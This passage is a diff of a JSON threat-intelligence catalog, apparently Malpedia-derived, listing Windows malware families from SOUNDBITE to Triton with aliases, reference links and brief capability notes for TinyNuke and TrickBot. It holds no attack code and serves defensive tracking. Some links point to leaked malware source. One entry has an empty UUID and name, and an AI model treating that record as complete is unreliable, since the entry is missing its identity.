"meta": { + "synonyms": [ + "denis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", + "value": "SOUNDBITE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", + "value": "Spedear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", + "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://github.com/MinervaLabsResearch/SporaVaccination", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" + ] + }, + "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", + "value": "Spora", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" + ] + }, + "uuid": "34e9d701-22a1-4315-891d-443edd077abf", + "value": "SpyBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", + 
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" + ] + }, + "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", + "value": "SquirtDanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "009db412-762d-4256-8df9-eb213be01ffd", + "value": "SslMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", + "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", + "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" + ] + }, + "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", + "value": "Stabuniq", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", + "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" + ] + }, + "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", + "value": "Stampedo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", + "https://securelist.com/operation-daybreak/75100/" + ] + }, + "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", + "value": "StarCruft", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": 
"f1decba9-6b3b-4636-a2b6-2208e178591a", + "value": "StarLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", + "value": "StarsyPound", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", + "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" + ] + }, + "uuid": "aea21616-061d-4177-9512-8887853394ed", + "value": "StegoLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" + ] + }, + "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", + "value": "Stinger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" + ] + }, + "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", + "value": "Stration", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", + "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", + "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", + "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", + "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" + ] + }, + "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", + "value": "Stresspaint", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ 
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", + "https://twitter.com/physicaldrive0/status/786293008278970368", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" + ] + }, + "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", + "value": "StrongPity", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + ] + }, + "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", + "value": "Stuxnet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" + ] + }, + "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", + "value": "SunOrcal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + ] + }, + "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", + "value": "SuppoBox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "Swift?", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", + "value": "Sword", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getkys" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", + "https://www.symantec.com/connect/blogs/sykipot-attacks", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://community.rsa.com/thread/185437" + ] + }, + "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", + "value": "sykipot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + ] + }, + "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", + "value": "SynAck", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", + "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" + ] + }, + "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", + "value": "SyncCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", + "value": "SynFlooder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" + ] + }, + "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", + "value": 
"Synth Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", + "value": "Sys10", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", + "value": "Syscon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", + "value": "SysGet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" + ] + }, + "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", + "value": "SysScan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", + "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", + "https://www.secureworks.com/research/srizbi", + "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" + ] + }, + "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", + "value": "Szribi", + "description": "" 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", + "value": "TabMsgSQL", + "description": "" + }, + { + "meta": { + "synonyms": [ + "simbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + ] + }, + "uuid": "94323b32-9566-450b-8480-5f9f53b57948", + "value": "taidoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" + ] + }, + "uuid": "b0467c03-824f-4071-8668-f056110d2a50", + "value": "Taleret", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" + ] + }, + "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", + "value": "Tandfuy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", + "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + ] + }, + "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", + "value": "Tapaoux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", + "value": "Tarsip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + ] + }, + "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", + "value": "tDiscoverer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", + "value": "TDTESS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", + "value": "TeleBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", + "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + ] + }, + "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", + "value": "TeleDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" + ] + }, + "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", + "value": "Tempedreve", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fakem RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", + 
"https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", + "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", + "value": "Terminator RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cryptesla" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", + "https://blogs.cisco.com/security/talos/teslacrypt", + "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", + "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", + "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + ] + }, + "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", + "value": "TeslaCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Alphabot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", + "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" + ] + }, + "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", + "value": "Thanatos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", + 
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", + "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" + ] + }, + "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", + "value": "Thanatos Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", + "value": "ThreeByte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", + "value": "ThumbThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" + ] + }, + "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", + "value": "Thunker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ] + }, + "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", + "value": "Tidepool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zusy", + "TinyBanker", + "Illi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", + 
"http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", + "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", + "http://garage4hackers.com/entry.php?b=3086", + "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://contagiodump.blogspot.com/2012/06/amazon.html", + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" + ] + }, + "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", + "value": "Tinba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", + "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" + ] + }, + "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", + "value": "TinyLoader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "NukeBot", + "Nuclear Bot", + "MicroBankingTrojan", + "Xbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", + "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", + "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + 
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" + ] + }, + "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", + "value": "TinyNuke", + "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + ] + }, + "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", + "value": "TinyTyphon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", + "value": "TinyZbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" + ] + }, + "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", + "value": "Tiop", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gheg" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + 
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.cert.pl/en/news/single/tofsee-en/", + "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" + ] + }, + "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", + "value": "Tofsee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", + "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", + "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" + ] + }, + "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", + "value": "TorrentLocker", + "description": "" + }, + { + "meta": { + "synonyms": [ + "huntpos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", + "http://adelmas.com/blog/treasurehunter.php", + "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", + "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" + ] + }, + "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", + "value": "TreasureHunter", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trickster", + "TheTrick", + "TrickLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + 
"https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + 
"http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
+ "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core",
+ "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
+ "https://www.youtube.com/watch?v=EdchPEHnohw",
+ "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
+ "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
+ "https://www.youtube.com/watch?v=lTywPmZEU1A",
+ "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer",
+ "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
+ "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/"
+ ]
+ },
+ "uuid": "c824813c-9c79-4917-829a-af72529e8329",
+ "value": "TrickBot",
+ "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. 
Phish > Attached MS Office > Marco enabled > Trickbot installed"
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Trisis",
+ "HatMan"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
+ "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
+ "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN"
+ ]
+ },
+ "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15",
+ "value": "win.triton",
